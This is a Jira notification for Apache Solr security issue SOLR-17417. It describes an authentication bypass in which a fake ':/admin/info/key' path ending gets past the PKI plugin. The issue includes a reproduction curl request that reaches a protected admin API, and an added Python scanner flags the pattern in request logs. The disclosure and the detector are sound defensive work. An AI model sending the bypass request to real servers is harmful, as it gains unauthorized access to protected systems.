[ https://issues.apache.org/jira/browse/SOLR-17417?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Houston Putman updated SOLR-17417:
----------------------------------
Security: (was: Private (Security Issue))
> Authentication bypass possible using a fake :/admin/info/key URL Path ending
> ----------------------------------------------------------------------------
>
> Key: SOLR-17417
> URL: https://issues.apache.org/jira/browse/SOLR-17417
> Project: Solr
> Issue Type: Bug
> Components: Authorization
> Reporter: Houston Putman
> Assignee: Houston Putman
> Priority: Blocker
> Fix For: 8.11.3, 9.7
>
> Attachments: SOLR-17417.patch
>
>
> By using ":/admin/info/key" at the end of the URL, the
> PKIAuthenticationPlugin can be bypassed, so that non-authorized users can
> access protected APIs.
> Reproduction:
> # Start Solr
> # {{./zkcli.sh -zkhost localhost:9983 -cmd put /security.json '{"authentication":{"class":"solr.BasicAuthPlugin","credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}},"authorization":{"class":"solr.RuleBasedAuthorizationPlugin","permissions":[{"name":"security-edit","role":"admin"}],"user-role":{"solr":"admin"}}}'}}
> # {{curl -H "SolrAuth: XXXXX" http://127.0.0.1:8983/solr/admin/info/properties:/admin/info/key}}
> The request should fail, but it will succeed.
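Added example (not part of the issue or of Solr's own code): a detection pass over request-log lines that flags the fake ":/admin/info/key" ending described above, so an operator can find attempts and successes in existing logs while patching. It assumes an NCSA-style request log; the sample lines are constructed, not taken from any deployment.

```python
import re
from urllib.parse import unquote

# Constructed sample request-log lines (NCSA-style); not from the issue or any real server.
SAMPLE_LOG = """\
127.0.0.1 - - [20/Aug/2024:10:00:01 +0000] "GET /solr/admin/info/key HTTP/1.1" 200 311
127.0.0.1 - - [20/Aug/2024:10:00:02 +0000] "GET /solr/admin/info/properties HTTP/1.1" 401 0
127.0.0.1 - - [20/Aug/2024:10:00:03 +0000] "GET /solr/admin/info/properties:/admin/info/key HTTP/1.1" 200 4021
10.0.0.5 - - [20/Aug/2024:10:00:04 +0000] "GET /solr/admin/info/properties%3A/admin/info/key HTTP/1.1" 200 4021
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The fake ending named in the issue: a colon followed by the public key endpoint path.
BYPASS_MARKER = ":/admin/info/key"


def is_bypass_path(target: str) -> bool:
    """True when the request path carries the ':/admin/info/key' marker.

    The genuine public endpoint is /solr/admin/info/key with no colon, so a colon
    directly before that path does not occur in legitimate traffic. The target is
    percent-decoded first so an encoded colon (%3A) is caught as well, and the
    query string is ignored.
    """
    path = unquote(target.split("?", 1)[0])
    return BYPASS_MARKER in path


def scan_request_log(text: str) -> list[dict]:
    """Return one record per log line whose path matches the bypass pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_bypass_path(m["target"]):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "method": m["method"],
            "path": unquote(m["target"]), "status": status,
            # A 2xx answer on a protected path with this marker means the bypass worked.
            "succeeded": 200 <= status < 300,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_request_log(SAMPLE_LOG):
        print(hit)
```

Lines carrying a 401 or 403 with the marker are attempts blocked by something else in the chain; 2xx lines are the ones to treat as successful unauthenticated access.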
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]